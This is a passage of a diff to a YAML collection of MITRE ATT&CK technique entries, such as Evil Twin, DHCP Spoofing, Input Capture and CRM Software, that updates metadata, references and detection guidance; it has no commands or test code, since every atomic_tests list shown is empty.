+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Traffic Flow'
+      type: attack-pattern
+      id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+      created: '2024-09-17T14:27:40.947Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1557/004
+        external_id: T1557.004
+      - source_name: Kaspersky evil twin
+        description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+          them. Retrieved September 17, 2024.
+        url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+      - source_name: medium evil twin
+        description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+          Attack. Retrieved September 17, 2024.
+        url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+      - source_name: specter ops evil twin
+        description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+          Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+          17, 2024.
+        url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+      - source_name: Australia ‘Evil Twin’
+        description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+          WiFi attack on plane. Retrieved September 17, 2024.
+        url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1602.002:
     technique:
       x_mitre_platforms:
@@ -41289,7 +41850,7 @@ collection:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
         description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted
           by Cyber Actors. Retrieved October 2, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-02-17T19:50:46.948Z'
       name: Network Device Configuration Dump
       description: "Adversaries may access network configuration files to collect
         sensitive data about the device and the network. The network configuration
@@ -41319,8 +41880,6 @@ collection:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1560:
     technique:
@@ -41374,7 +41933,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1560
     atomic_tests: []
   T1185:
@@ -41411,7 +41969,7 @@ collection:
         description: Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual.
           Retrieved May 24, 2017.
         source_name: cobaltstrike manual
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-02-25T18:58:15.229Z'
       name: Browser Session Hijacking
       description: |-
         Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)
@@ -41439,12 +41997,10 @@ collection:
       - Administrator
       - SYSTEM
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1557.003:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-09-12T19:46:04.759Z'
       name: DHCP Spoofing
       description: "Adversaries may redirect network traffic to adversary-owned systems
         by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
@@ -41481,23 +42037,23 @@ collection:
         phase_name: credential-access
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Alex Spivakovsky, Pentera
+      - Andrew Allen, @whitehat_zero
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
         involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
         monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
         specify that the IP allocations are low or have run out; these EIDs may indicate
         a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - Windows
       - macOS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
       x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Alex Spivakovsky, Pentera
-      - Andrew Allen, @whitehat_zero
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Application Log: Application Log Content'
@@ -41530,21 +42086,20 @@ collection:
       - source_name: solution_monitor_dhcp_scopes
         description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
           and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
-          March 7, 2022.'
-        url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+          September 12, 2024.'
+        url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
       - source_name: w32.tidserv.g
         description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
           14, 2022.
         url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1557.001:
     technique:
-      modified: '2023-04-25T14:00:00.188Z'
+      modified: '2022-10-25T15:46:55.393Z'
       name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
       description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
         spoof an authoritative source for name resolution to force communication with
@@ -41652,12 +42207,11 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1557.001
     atomic_tests: []
   T1056.003:
     technique:
-      modified: '2023-03-30T21:01:46.711Z'
+      modified: '2024-10-15T16:43:43.849Z'
       name: Web Portal Capture
       description: |-
         Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -41668,13 +42222,13 @@ collection:
         phase_name: collection
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: File monitoring may be used to detect changes to files in
         the Web directory for organization login pages that do not match with authorized
         updates to the Web server's content.
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
@@ -41688,6 +42242,7 @@ collection:
       id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
       created: '2020-02-11T18:59:50.058Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056/003
@@ -41698,12 +42253,12 @@ collection:
         url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1125:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.205Z'
       name: Video Capture
       description: |-
         An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.
@@ -41748,30 +42303,11 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
       identifier: T1125
     atomic_tests: []
   T1213.001:
     technique:
-      x_mitre_platforms:
-      - SaaS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
-      type: attack-pattern
-      created: '2020-02-14T13:09:51.004Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1213.001
-        url: https://attack.mitre.org/techniques/T1213/001
-      - url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
-        description: Atlassian. (2018, January 9). How to Enable User Access Logging.
-          Retrieved April 4, 2018.
-        source_name: Atlassian Confluence Logging
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-30T13:45:42.840Z'
       name: Confluence
       description: |2
 
@@ -41781,31 +42317,48 @@ collection:
         * Physical / logical network diagrams
         * System architecture diagrams
         * Technical system documentation
-        * Testing / development credentials
+        * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
         * Work / project schedules
         * Source code snippets
         * Links to network shares and other internal resources
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
 
         User access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
+      created: '2020-02-14T13:09:51.004Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/001
+        external_id: T1213.001
+      - source_name: Atlassian Confluence Logging
+        description: Atlassian. (2018, January 9). How to Enable User Access Logging.
+          Retrieved April 4, 2018.
+        url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1114.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Email Collection: Email Forwarding Rule'
       description: "Adversaries may setup email forwarding rules to collect sensitive
         information. Adversaries may abuse email forwarding rules to monitor the activities
@@ -41838,10 +42391,12 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Security
       - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
       - Liran Ravich, CardinalOps
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. This is especially true in cases with hidden auto-forwarding rules. This makes it only possible to reliably detect the existence of a hidden auto-forwarding rule by examining message tracking logs or by using a MAPI editor to notice the modified rule property values.(Citation: Pfammatter - Hidden Inbox Rules)
@@ -41850,16 +42405,17 @@ collection:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - Windows
-      - Google Workspace
       - macOS
       - Linux
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
+      - 'Cloud Service: Cloud Service Metadata'
       type: attack-pattern
       id: attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0
       created: '2020-02-19T18:54:47.103Z'
@@ -41891,70 +42447,66 @@ collection:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1114.003
     atomic_tests: []
   T1074:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - IaaS
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      - Shane Tully, @securitygypsy
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
-      created: '2017-05-31T21:30:58.938Z'
-      x_mitre_version: '1.4'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1074
-        url: https://attack.mitre.org/techniques/T1074
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: PWC Cloud Hopper April 2017
-        url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
-        description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
-          April 5, 2017.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-09-30T13:28:37.415Z'
+      name: Data Staged
       description: |-
         Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)
 
         In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
 
         Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.
-      modified: '2022-11-08T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Data Staged
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Praetorian
+      - Shane Tully, @securitygypsy
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
 
         Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
 
         Consider monitoring accesses and modifications to storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: collection
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'File: File Creation'
       - 'Windows Registry: Windows Registry Key Modification'
       - 'Command: Command Execution'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
+      created: '2017-05-31T21:30:58.938Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1074
+        external_id: T1074
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: PWC Cloud Hopper April 2017
+        description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
+          April 5, 2017.
+        url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.002:
     technique:
@@ -42027,7 +42579,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.002
     atomic_tests: []
   T1039:
@@ -42082,12 +42633,11 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1039
     atomic_tests: []
   T1114.002:
     technique:
-      modified: '2023-05-31T12:34:03.420Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Email Collection: Remote Email Collection'
       description: Adversaries may target an Exchange server, Office 365, or Google
         Workspace to collect sensitive information. Adversaries may leverage a user's
@@ -42099,6 +42649,9 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor for unusual login activity from unknown or abnormal
         locations, especially for privileged accounts (ex: Exchange administrator
@@ -42106,11 +42659,11 @@ collection:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - Windows
-      - Google Workspace
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -42127,14 +42680,11 @@ collection:
         external_id: T1114.002
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1114.002
     atomic_tests: []
   T1056:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-08-13T17:33:45.244Z'
       name: Input Capture
       description: Adversaries may use methods of capturing user input to obtain credentials
         or collect information. During normal system usage, users often provide credentials
@@ -42150,6 +42700,7 @@ collection:
         phase_name: credential-access
       x_mitre_contributors:
       - John Lambert, Microsoft Threat Intelligence Center
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection may vary depending on how input is captured but
         may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
         `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -42158,13 +42709,13 @@ collection:
         keylogging or API hooking are present.'
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
       - Network
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -42172,15 +42723,11 @@ collection:
       - 'Process: Process Metadata'
       - 'Process: OS API Execution'
       - 'Driver: Driver Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      - root
-      - User
       type: attack-pattern
       id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
       created: '2017-05-31T21:30:48.323Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056
@@ -42191,9 +42738,60 @@ collection:
         url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1213.004:
+    technique:
+      modified: '2024-10-17T14:36:24.983Z'
+      name: Customer Relationship Management Software
+      description: |-
+        Adversaries may leverage Customer Relationship Management (CRM) software to mine valuable information. CRM software is used to assist organizations in tracking and managing customer interactions, as well as storing customer data.
+
+        Once adversaries gain access to a victim organization, they may mine CRM software for customer data. This may include personally identifiable information (PII) such as full names, emails, phone numbers, and addresses, as well as additional details such as purchase histories and IT support interactions. By collecting this data, an adversary may be able to send personalized [Phishing](https://attack.mitre.org/techniques/T1566) emails, engage in SIM swapping, or otherwise target the organization’s customers in ways that enable financial gain or the compromise of additional organizations.(Citation: Bleeping Computer US Cellular Hack 2022)(Citation: Bleeping Computer Mint Mobile Hack 2021)(Citation: Bleeping Computer Bank Hack 2020)
+
+        CRM software may be hosted on-premises or in the cloud. Information stored in these solutions may vary based on the specific instance or environment. Examples of CRM software include Microsoft Dynamics 365, Salesforce, Zoho, Zendesk, and HubSpot.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Centre for Cybersecurity Belgium (CCB)
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Logon Session: Logon Session Creation'
+      - 'Application Log: Application Log Content'
+      type: attack-pattern
+      id: attack-pattern--bbfbb096-6561-4d7d-aa2c-a5ee8e44c696
+      created: '2024-07-01T20:06:13.664Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/004
+        external_id: T1213.004
+      - source_name: Bleeping Computer Bank Hack 2020
+        description: Ionut Ilascu. (2020, January 16). Customer-Owned Bank Informs
+          100k of Breach Exposing Account Balance, PII. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/customer-owned-bank-informs-100k-of-breach-exposing-account-balance-pii/
+      - source_name: Bleeping Computer Mint Mobile Hack 2021
+        description: Lawrence Abrams. (2021, July 10). Mint Mobile hit by a data breach
+          after numbers ported, data accessed. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/mint-mobile-hit-by-a-data-breach-after-numbers-ported-data-accessed/
+      - source_name: Bleeping Computer US Cellular Hack 2022
+        description: Sergiu Gatlan. (2022, January 4). UScellular discloses data breach
+          after billing system hack. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/uscellular-discloses-data-breach-after-billing-system-hack/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1557.002:
     technique:
@@ -42239,7 +42837,7 @@ collection:
         The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
 
         Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-22T18:37:22.176Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: ARP Cache Poisoning
       x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
@@ -42258,37 +42856,36 @@ collection:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1213.003:
     technique:
-      modified: '2022-10-18T22:44:01.723Z'
+      modified: '2024-09-04T13:03:54.101Z'
       name: Code Repositories
       description: |-
         Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.
 
-        Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code.  Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
+        Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or [Unsecured Credentials](https://attack.mitre.org/techniques/T1552) contained within software's source code.  Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
 
         **Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code repositories.
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Itamar Mizrahi, Cymptom
+      - Toby Kohlenberg
+      - Josh Liburdi, @jshlbrd
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor access to code repositories, especially performed
         by privileged users such as Active Directory Domain or Enterprise Administrators
         as these types of accounts should generally not be used to access code repositories.
         In environments with high-maturity, it may be possible to leverage User-Behavioral
         Analytics (UBA) platforms to detect and alert on user-based anomalies.
-      x_mitre_platforms:
-      - SaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Itamar Mizrahi, Cymptom
-      - Toby Kohlenberg
-      - Josh Liburdi, @jshlbrd
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -42311,41 +42908,52 @@ collection:
         url: https://krebsonsecurity.com/2013/10/adobe-to-announce-source-code-customer-data-breach/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1213:
     technique:
-      modified: '2024-03-01T16:27:47.391Z'
+      modified: '2024-10-28T19:10:16.960Z'
       name: Data from Information Repositories
       description: "Adversaries may leverage information repositories to mine valuable
         information. Information repositories are tools that allow for storage of
         information, typically to facilitate collaboration or information sharing
